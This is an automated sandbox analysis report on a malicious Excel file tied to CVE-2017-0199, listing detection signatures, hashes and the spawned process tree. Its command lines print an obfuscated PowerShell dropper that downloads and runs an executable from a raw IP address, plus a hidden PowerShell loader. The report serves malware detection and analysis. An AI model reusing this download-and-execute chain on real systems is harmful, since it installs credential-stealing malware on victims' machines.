Edit tour
Windows
Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx
Overview
General Information
| Sample name: | SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsx |
| Analysis ID: | 1543746 |
| MD5: | 476e05dbccfd74ce2aa888a42d0438e8 |
| SHA1: | 6e763cf9a6825c5ce3224a4630625659bad08b51 |
| SHA256: | b8fdd158f41abbd97902857a684a23003d32ebe27ba601d83e0778ee1bdd2ea9 |
| Tags: | xlsx |
| Infos: |   |
 | |
Detection
HTMLPhisher
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w7x64
EXCEL.EXE (PID: 3344 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 3612 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
powershell.exe (PID: 3704 cmdline: "C:\Window s\SYstEm32 \windowSpo WerSHell\V 1.0\pOWeRS HelL.exe" "POWeRShEL L -ex bYpa SS -N OP -W 1 -c DEvIcEcre DEnTiAlDep LoymENt.ex E ; iEX($( iEX('[sYsT em.TeXt.EN cOdiNG]'+[ cHaR]58+[C hAR]0X3A+' Utf8.gETST Ring([SyST eM.cOnVERt ]'+[chAr]0 x3a+[ChaR] 58+'FrOMbA SE64StRInG ('+[ChAr]0 X22+'JFZrY SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFERC1 UWVBFICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIC1NR U1iZXJERUZ pbmlUaU9OI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CdbRGxsSW1 wb3J0KCJ1U mxtT24uRGx sIiwgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQ2hhc lNldCA9IEN oYXJTZXQuV W5pY29kZSl dcHVibGljI HN0YXRpYyB leHRlcm4gS W50UHRyIFV STERvd25sb 2FkVG9GaWx lKEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBna1ZRa2x sWixzdHJpb mcgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAga2hjcCx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAga 1ZQd3ZTLHV pbnQgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgSWl5c VNOLEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBKTmopO ycgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU5hTWU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gInRkeklWb kpaQllrIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tbmFNRXNQY WNlICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIFFLeVY gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLVBhc3NUa HJ1OyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAkVmt hOjpVUkxEb 3dubG9hZFR vRmlsZSgwL CJodHRwOi8 vMTA3LjE3N S4xMTMuMjE 0LzkwMi93Y WxuZXh0LmV 4ZSIsIiRFT nY6QVBQREF UQVx3bGFuZ Xh0LmV4ZSI sMCwwKTtzd EFSVC1zTGV FcCgzKTtzV GFSVCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAiJEV OVjpBUFBEQ VRBXHdsYW5 leHQuZXhlI g=='+[cHAr ]34+'))')) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 3808 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex bYpaSS -NOP -W 1 -c DEvIcE creDEnTiAl DepLoymENt .exE MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3920 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\muz5o0 kx\muz5o0k x.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3928 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES6549.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\muz 5o0kx\CSCE 919D41A8D9 04501847FA AE39BA08A1 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
wlanext.exe (PID: 4008 cmdline: "C:\Users\ user\AppDa ta\Roaming \wlanext.e xe" MD5: 2F9C0BA283506D8333E4F59B29FBEBA3) - powershell.exe (PID: 4036 cmdline:
powershell .exe -wind owstyle hi dden "$Fer vence=Get- Content -r aw 'C:\Use rs\user\Ap pData\Roam ing\mobili seredes\fo rbundsbank \Nahani132 .Udf';$Tuf fen=$Ferve nce.SubStr ing(71717, 3);.$Tuffe n($Fervenc e) " MD5: EB32C070E658937AA9FA9F3AE629B2B8) 
msiexec.exe (PID: 2100 cmdline: "C:\Window s\SysWOW64 \msiexec.e xe" MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
System Summary |   |
|---|
| Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||